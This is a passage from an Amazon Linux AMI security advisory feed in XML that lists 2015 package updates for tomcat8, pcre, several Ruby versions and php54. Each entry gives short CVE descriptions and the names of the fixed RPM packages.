epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.59" release="1.8.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.59-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.59" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.59-1.8.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-527</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-527: medium priority package update for tomcat8</title><issued date="2015-05-14 14:40:00" /><updated date="2015-05-14 23:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0227:
It was discovered that the ChunkedInputFilter in Tomcat did not fail subsequent attempts to read input after malformed chunked encoding was detected. A remote attacker could possibly use this flaw to make Tomcat process part of the request body as a new request, or cause a denial of service.
1109196:
CVE-2014-0227 Tomcat/JBossWeb: request smuggling and limited DoS in ChunkedInputFilter
CVE-2014-0099:
It was found that JBoss Web / Apache Tomcat did not check for overflowing values when parsing request content length headers. A remote attacker could use this flaw to perform an HTTP request smuggling attack on a JBoss Web / Apache Tomcat server located behind a reverse proxy that processed the content length header correctly.
1102030:
CVE-2014-0099 Tomcat/JBossWeb: Request smuggling via malicious content length header
CVE-2014-0096:
It was found that the org.apache.catalina.servlets.DefaultServlet implementation in JBoss Web / Apache Tomcat allowed the definition of XML External Entities (XXEs) in provided XSLTs. A malicious application could use this to circumvent intended security restrictions to disclose sensitive information.
1088342:
CVE-2014-0096 Tomcat/JBossWeb: XXE vulnerability via user supplied XSLTs
CVE-2014-0075:
It was discovered that JBoss Web / Apache Tomcat did not limit the length of chunk sizes when using chunked transfer encoding. A remote attacker could use this flaw to perform a denial of service attack against JBoss Web / Apache Tomcat by streaming an unlimited quantity of data, leading to excessive consumption of server resources.
1072776:
CVE-2014-0075 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0075" title="" id="CVE-2014-0075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0096" title="" id="CVE-2014-0096" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0099" title="" id="CVE-2014-0099" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0227" title="" id="CVE-2014-0227" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-admin-webapps" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.20" release="1.53.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-lib-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.20-1.53.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.20" release="1.53.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.20-1.53.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-528</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-528: low priority package update for pcre</title><issued date="2015-05-27 14:03:00" /><updated date="2015-05-27 15:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8964:
A flaw was found in the way PCRE handled certain malformed regular expressions. This issue could cause an application (for example, Konqueror) linked against PCRE to crash while parsing malicious regular expressions.
1166147:
CVE-2014-8964 pcre: incorrect handling of zero-repeat assertion conditions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8964" title="" id="CVE-2014-8964" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pcre-static" version="8.21" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-static-8.21-7.7.amzn1.x86_64.rpm</filename></package><package name="pcre" version="8.21" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-8.21-7.7.amzn1.x86_64.rpm</filename></package><package name="pcre-debuginfo" version="8.21" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-debuginfo-8.21-7.7.amzn1.x86_64.rpm</filename></package><package name="pcre-devel" version="8.21" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-devel-8.21-7.7.amzn1.x86_64.rpm</filename></package><package name="pcre-tools" version="8.21" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-tools-8.21-7.7.amzn1.x86_64.rpm</filename></package><package name="pcre-devel" version="8.21" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-devel-8.21-7.7.amzn1.i686.rpm</filename></package><package name="pcre-debuginfo" version="8.21" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-debuginfo-8.21-7.7.amzn1.i686.rpm</filename></package><package name="pcre-static" version="8.21" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-static-8.21-7.7.amzn1.i686.rpm</filename></package><package name="pcre-tools" version="8.21" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-tools-8.21-7.7.amzn1.i686.rpm</filename></package><package name="pcre" version="8.21" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-8.21-7.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2015-529</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-529: medium priority package update for ruby18</title><issued date="2015-05-27 14:05:00" /><updated date="2015-05-27 15:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1855:
1209981:
CVE-2015-1855 ruby: OpenSSL extension hostname matching implementation violates RFC 6125
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1855" title="" id="CVE-2015-1855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby18-debuginfo" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby18-debuginfo-1.8.7.374-2.42.4.amzn1.x86_64.rpm</filename></package><package name="ruby18-static" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby18-static-1.8.7.374-2.42.4.amzn1.x86_64.rpm</filename></package><package name="ruby18" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby18-1.8.7.374-2.42.4.amzn1.x86_64.rpm</filename></package><package name="ruby18-devel" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby18-devel-1.8.7.374-2.42.4.amzn1.x86_64.rpm</filename></package><package name="ruby18-libs" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby18-libs-1.8.7.374-2.42.4.amzn1.x86_64.rpm</filename></package><package name="ruby18-ri" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby18-ri-1.8.7.374-2.42.4.amzn1.x86_64.rpm</filename></package><package name="ruby18-irb" version="0.9.5" release="2.42.4.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby18-irb-0.9.5-2.42.4.amzn1.noarch.rpm</filename></package><package name="ruby18-rdoc" version="1.0.1" release="2.42.4.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby18-rdoc-1.0.1-2.42.4.amzn1.noarch.rpm</filename></package><package name="ruby18-static" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby18-static-1.8.7.374-2.42.4.amzn1.i686.rpm</filename></package><package name="ruby18-libs" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" 
arch="i686"><filename>Packages/ruby18-libs-1.8.7.374-2.42.4.amzn1.i686.rpm</filename></package><package name="ruby18-ri" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby18-ri-1.8.7.374-2.42.4.amzn1.i686.rpm</filename></package><package name="ruby18-debuginfo" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby18-debuginfo-1.8.7.374-2.42.4.amzn1.i686.rpm</filename></package><package name="ruby18-devel" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby18-devel-1.8.7.374-2.42.4.amzn1.i686.rpm</filename></package><package name="ruby18" version="1.8.7.374" release="2.42.4.amzn1" epoch="0" arch="i686"><filename>Packages/ruby18-1.8.7.374-2.42.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-530</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-530: medium priority package update for ruby19</title><issued date="2015-05-27 14:05:00" /><updated date="2015-05-27 15:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1855:
1209981:
CVE-2015-1855 ruby: OpenSSL extension hostname matching implementation violates RFC 6125
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1855" title="" id="CVE-2015-1855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems19-devel" version="1.8.23.2" release="32.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23.2-32.66.amzn1.noarch.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.551-32.66.amzn1.x86_64.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.551-32.66.amzn1.x86_64.rpm</filename></package><package name="ruby19-irb" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.551-32.66.amzn1.noarch.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.551-32.66.amzn1.x86_64.rpm</filename></package><package name="rubygems19" version="1.8.23.2" release="32.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23.2-32.66.amzn1.noarch.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.551-32.66.amzn1.x86_64.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-32.66.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="32.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-32.66.amzn1.noarch.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.66.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.66.amzn1.x86_64.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="32.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-32.66.amzn1.noarch.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="32.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-32.66.amzn1.noarch.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.551-32.66.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-32.66.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-32.66.amzn1.i686.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.551-32.66.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.551-32.66.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.66.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.551-32.66.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.551-32.66.amzn1.i686.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.66.amzn1" epoch="0" 
arch="i686"><filename>Packages/rubygem19-io-console-0.3-32.66.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="32.66.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.551-32.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-531</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-531: medium priority package update for ruby20</title><issued date="2015-05-27 14:05:00" /><updated date="2015-05-27 15:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1855:
1209981:
CVE-2015-1855 ruby: OpenSSL extension hostname matching implementation violates RFC 6125
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1855" title="" id="CVE-2015-1855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby20-debuginfo" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.645-1.25.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.25.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.645-1.25.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.25.amzn1.x86_64.rpm</filename></package><package name="ruby20-doc" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.645-1.25.amzn1.noarch.rpm</filename></package><package name="ruby20-irb" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.645-1.25.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.645-1.25.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14" release="1.25.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14-1.25.amzn1.noarch.rpm</filename></package><package name="ruby20-libs" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.645-1.25.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14" release="1.25.amzn1" epoch="0" 
arch="noarch"><filename>Packages/rubygems20-devel-2.0.14-1.25.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.25.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.25.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.25.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.645-1.25.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.645-1.25.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.645-1.25.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.25.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.645" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.645-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-532</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-532: medium priority package update for ruby21</title><issued date="2015-05-27 14:06:00" /><updated date="2015-05-27 15:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1855:
1209981:
CVE-2015-1855 ruby: OpenSSL extension hostname matching implementation violates RFC 6125
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1855" title="" id="CVE-2015-1855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby21-devel" version="2.1.6" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.6-1.16.amzn1.x86_64.rpm</filename></package><package name="ruby21-irb" version="2.1.6" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.6-1.16.amzn1.noarch.rpm</filename></package><package name="rubygems21-devel" version="2.2.3" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-devel-2.2.3-1.16.amzn1.noarch.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.16.amzn1.x86_64.rpm</filename></package><package name="rubygems21" version="2.2.3" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-2.2.3-1.16.amzn1.noarch.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.6" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.6-1.16.amzn1.x86_64.rpm</filename></package><package name="ruby21" version="2.1.6" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-2.1.6-1.16.amzn1.x86_64.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.3-1.16.amzn1.x86_64.rpm</filename></package><package name="ruby21-libs" version="2.1.6" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.6-1.16.amzn1.x86_64.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.16.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" 
version="2.1.6" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.6-1.16.amzn1.noarch.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.3-1.16.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.6" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.6-1.16.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.16.amzn1.i686.rpm</filename></package><package name="ruby21" version="2.1.6" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.6-1.16.amzn1.i686.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.16.amzn1.i686.rpm</filename></package><package name="ruby21-libs" version="2.1.6" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.6-1.16.amzn1.i686.rpm</filename></package><package name="ruby21-devel" version="2.1.6" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.6-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-533</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-533: medium priority package update for ruby22</title><issued date="2015-05-27 14:06:00" /><updated date="2015-05-27 15:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1855:
1209981:
CVE-2015-1855 ruby: OpenSSL extension hostname matching implementation violates RFC 6125
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1855" title="" id="CVE-2015-1855" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems22-devel" version="2.4.5" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-devel-2.4.5-1.5.amzn1.noarch.rpm</filename></package><package name="ruby22-libs" version="2.2.2" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-libs-2.2.2-1.5.amzn1.x86_64.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.2" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-debuginfo-2.2.2-1.5.amzn1.x86_64.rpm</filename></package><package name="ruby22-devel" version="2.2.2" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-devel-2.2.2-1.5.amzn1.x86_64.rpm</filename></package><package name="ruby22-doc" version="2.2.2" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-doc-2.2.2-1.5.amzn1.noarch.rpm</filename></package><package name="ruby22" version="2.2.2" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-2.2.2-1.5.amzn1.x86_64.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.5.amzn1.x86_64.rpm</filename></package><package name="rubygem22-psych" version="2.0.8" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-psych-2.0.8-1.5.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-io-console-0.4.3-1.5.amzn1.x86_64.rpm</filename></package><package name="rubygems22" version="2.4.5" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-2.4.5-1.5.amzn1.noarch.rpm</filename></package><package name="ruby22-irb" version="2.2.2" 
release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-irb-2.2.2-1.5.amzn1.noarch.rpm</filename></package><package name="ruby22-libs" version="2.2.2" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-libs-2.2.2-1.5.amzn1.i686.rpm</filename></package><package name="rubygem22-psych" version="2.0.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-psych-2.0.8-1.5.amzn1.i686.rpm</filename></package><package name="ruby22" version="2.2.2" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-2.2.2-1.5.amzn1.i686.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-io-console-0.4.3-1.5.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.2" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-debuginfo-2.2.2-1.5.amzn1.i686.rpm</filename></package><package name="ruby22-devel" version="2.2.2" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-devel-2.2.2-1.5.amzn1.i686.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-534</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-534: important priority package update for php54</title><issued date="2015-06-02 22:20:00" /><updated date="2015-06-02 22:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4026:
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
1223422:
CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character
CVE-2015-4025:
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
1223408:
CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+
CVE-2015-4024:
A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time.
1222485:
CVE-2015-4024 php: multipart/form-data request parsing CPU usage DoS
CVE-2015-4022:
An integer overflow flaw leading to a heap-based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.
1223412:
CVE-2015-4022 php: integer overflow on reading FTP server data leading to heap overflow
1223412:
CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing
CVE-2015-4021:
An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1223425:
CVE-2015-4021 php: memory corruption in phar_parse_tarfile when entry filename starts with NULL
1223425:
CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name
CVE-2015-2326:
1207202:
CVE-2015-2326 pcre: heap buffer overflow in pcre_compile2()
CVE-2015-2325:
1207198:
CVE-2015-2325 pcre: heap buffer overflow in compile_branch()
